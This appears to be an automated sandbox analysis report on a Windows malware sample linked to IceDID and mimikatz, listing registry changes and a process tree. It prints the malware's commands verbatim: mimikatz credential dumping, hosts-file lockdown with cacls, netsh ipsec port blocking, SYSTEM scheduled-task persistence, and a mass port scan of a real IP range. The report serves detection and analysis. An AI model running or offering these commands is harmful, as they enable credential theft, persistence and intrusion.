\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vmgkttu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bqbingtiu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ewqkwq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lbkbubrfy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4328 cmd.exe 4076 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023487-6.dat nsis_installer_2 behavioral2/files/0x000700000002348e-14.dat nsis_installer_1 behavioral2/files/0x000700000002348e-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" vmgkttu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" vmgkttu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" vmgkttu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" vmgkttu.exe Key created \REGISTRY\USER\.DEFAULT\Software uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vmgkttu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vmgkttu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uuinytuyr.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" vmgkttu.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4076 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3460 schtasks.exe 3964 schtasks.exe 3584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4752 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4752 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe Token: SeDebugPrivilege 736 vmgkttu.exe Token: SeDebugPrivilege 2240 vmgkttu.exe Token: SeDebugPrivilege 4856 vfshost.exe Token: SeDebugPrivilege 4752 uuinytuyr.exe Token: SeLockMemoryPrivilege 4544 byibml.exe Token: SeLockMemoryPrivilege 4544 byibml.exe Token: SeDebugPrivilege 4444 uuinytuyr.exe Token: SeDebugPrivilege 3044 uuinytuyr.exe Token: SeDebugPrivilege 692 uuinytuyr.exe Token: SeDebugPrivilege 4868 uuinytuyr.exe Token: SeDebugPrivilege 4724 uuinytuyr.exe Token: SeDebugPrivilege 628 uuinytuyr.exe Token: SeDebugPrivilege 216 uuinytuyr.exe Token: SeDebugPrivilege 3532 uuinytuyr.exe Token: SeDebugPrivilege 4572 uuinytuyr.exe Token: SeDebugPrivilege 4624 uuinytuyr.exe Token: SeDebugPrivilege 3276 uuinytuyr.exe Token: SeDebugPrivilege 5076 uuinytuyr.exe Token: SeDebugPrivilege 220 uuinytuyr.exe Token: SeDebugPrivilege 4352 uuinytuyr.exe Token: SeDebugPrivilege 1388 uuinytuyr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 4752 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe 4752 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe 736 vmgkttu.exe 736 vmgkttu.exe 2240 vmgkttu.exe 2240 vmgkttu.exe 4156 xohudmc.exe 3708 ewqkwq.exe 2236 vmgkttu.exe 2236 vmgkttu.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4752 wrote to memory of 4328 4752 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe 85 PID 4752 wrote to memory of 4328 4752 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe 85 PID 4752 wrote to memory of 4328 4752 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe 85 PID 4328 wrote to memory of 4076 4328 cmd.exe 87 PID 4328 wrote to memory of 4076 4328 cmd.exe 87 PID 4328 wrote to memory of 4076 4328 cmd.exe 87 PID 4328 wrote to memory of 736 4328 cmd.exe 90 PID 4328 wrote to memory of 736 4328 cmd.exe 90 PID 4328 wrote to memory of 736 4328 cmd.exe 90 PID 2240 wrote to memory of 4200 2240 vmgkttu.exe 92 PID 2240 wrote to memory of 4200 2240 vmgkttu.exe 92 PID 2240 wrote to memory of 4200 2240 vmgkttu.exe 92 PID 4200 wrote to memory of 1960 4200 cmd.exe 94 PID 4200 wrote to memory of 1960 4200 cmd.exe 94 PID 4200 wrote to memory of 1960 4200 cmd.exe 94 PID 4200 wrote to memory of 468 4200 cmd.exe 95 PID 4200 wrote to memory of 468 4200 cmd.exe 95 PID 4200 wrote to memory of 468 4200 cmd.exe 95 PID 4200 wrote to memory of 5108 4200 cmd.exe 96 PID 4200 wrote to memory of 5108 4200 cmd.exe 96 PID 4200 wrote to memory of 5108 4200 cmd.exe 96 PID 4200 wrote to memory of 4548 4200 cmd.exe 97 PID 4200 wrote to memory of 4548 4200 cmd.exe 97 PID 4200 wrote to memory of 4548 4200 cmd.exe 97 PID 4200 wrote to memory of 2512 4200 cmd.exe 98 PID 4200 wrote to memory of 2512 4200 cmd.exe 98 PID 4200 wrote to memory of 2512 4200 cmd.exe 98 PID 4200 wrote to memory of 2456 4200 cmd.exe 99 PID 4200 wrote to memory of 2456 4200 cmd.exe 99 PID 4200 wrote to memory of 2456 4200 cmd.exe 99 PID 2240 wrote to memory of 2472 2240 vmgkttu.exe 100 PID 2240 wrote to memory of 2472 2240 vmgkttu.exe 100 PID 2240 wrote to memory of 2472 2240 vmgkttu.exe 100 PID 2240 wrote to memory of 4864 2240 vmgkttu.exe 102 PID 2240 wrote to memory of 4864 2240 vmgkttu.exe 102 PID 2240 wrote to memory of 4864 2240 vmgkttu.exe 102 PID 2240 wrote to memory of 3708 2240 vmgkttu.exe 104 PID 2240 wrote to memory of 3708 2240 vmgkttu.exe 104 PID 2240 wrote to memory of 3708 2240 vmgkttu.exe 104 PID 2240 wrote to memory of 3664 2240 vmgkttu.exe 108 PID 2240 wrote to memory of 3664 2240 vmgkttu.exe 108 PID 2240 wrote to memory of 3664 2240 vmgkttu.exe 108 PID 3664 wrote to memory of 1740 3664 cmd.exe 110 PID 3664 wrote to memory of 1740 3664 cmd.exe 110 PID 3664 wrote to memory of 1740 3664 cmd.exe 110 PID 1740 wrote to memory of 5024 1740 wpcap.exe 111 PID 1740 wrote to memory of 5024 1740 wpcap.exe 111 PID 1740 wrote to memory of 5024 1740 wpcap.exe 111 PID 5024 wrote to memory of 1912 5024 net.exe 113 PID 5024 wrote to memory of 1912 5024 net.exe 113 PID 5024 wrote to memory of 1912 5024 net.exe 113 PID 1740 wrote to memory of 5052 1740 wpcap.exe 114 PID 1740 wrote to memory of 5052 1740 wpcap.exe 114 PID 1740 wrote to memory of 5052 1740 wpcap.exe 114 PID 5052 wrote to memory of 4656 5052 net.exe 116 PID 5052 wrote to memory of 4656 5052 net.exe 116 PID 5052 wrote to memory of 4656 5052 net.exe 116 PID 1740 wrote to memory of 3264 1740 wpcap.exe 117 PID 1740 wrote to memory of 3264 1740 wpcap.exe 117 PID 1740 wrote to memory of 3264 1740 wpcap.exe 117 PID 3264 wrote to memory of 552 3264 net.exe 119 PID 3264 wrote to memory of 552 3264 net.exe 119 PID 3264 wrote to memory of 552 3264 net.exe 119 PID 1740 wrote to memory of 2468 1740 wpcap.exe 120
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2268
-
C:\Windows\TEMP\ypcijinrc\byibml.exe"C:\Windows\TEMP\ypcijinrc\byibml.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Users\Admin\AppData\Local\Temp\202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kunylkua\vmgkttu.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4076
-
-
C:\Windows\kunylkua\vmgkttu.exeC:\Windows\kunylkua\vmgkttu.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:736
-
-
-
C:\Windows\kunylkua\vmgkttu.exeC:\Windows\kunylkua\vmgkttu.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2456
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2472
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4864
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3708
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nntufbicv\uibkahlsb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\nntufbicv\uibkahlsb\wpcap.exeC:\Windows\nntufbicv\uibkahlsb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4656
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:552
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2468 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2952
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3068 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4388 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4384
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:864 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2356 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3876
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nntufbicv\uibkahlsb\bqbingtiu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nntufbicv\uibkahlsb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3060 -
C:\Windows\nntufbicv\uibkahlsb\bqbingtiu.exeC:\Windows\nntufbicv\uibkahlsb\bqbingtiu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nntufbicv\uibkahlsb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1172
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nntufbicv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nntufbicv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\nntufbicv\Corporate\vfshost.exeC:\Windows\nntufbicv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iungtilsu" /ru system /tr "cmd /c C:\Windows\ime\vmgkttu.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4156 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iungtilsu" /ru system /tr "cmd /c C:\Windows\ime\vmgkttu.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wgrgkckyl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kunylkua\vmgkttu.exe /p everyone:F"2⤵PID:1588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wgrgkckyl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kunylkua\vmgkttu.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bmpsinsgu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ypcijinrc\byibml.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bmpsinsgu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ypcijinrc\byibml.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3460
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3440
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1184
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1612
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4152
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:692
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:980
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4724
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3264
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3208
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1872
-
-
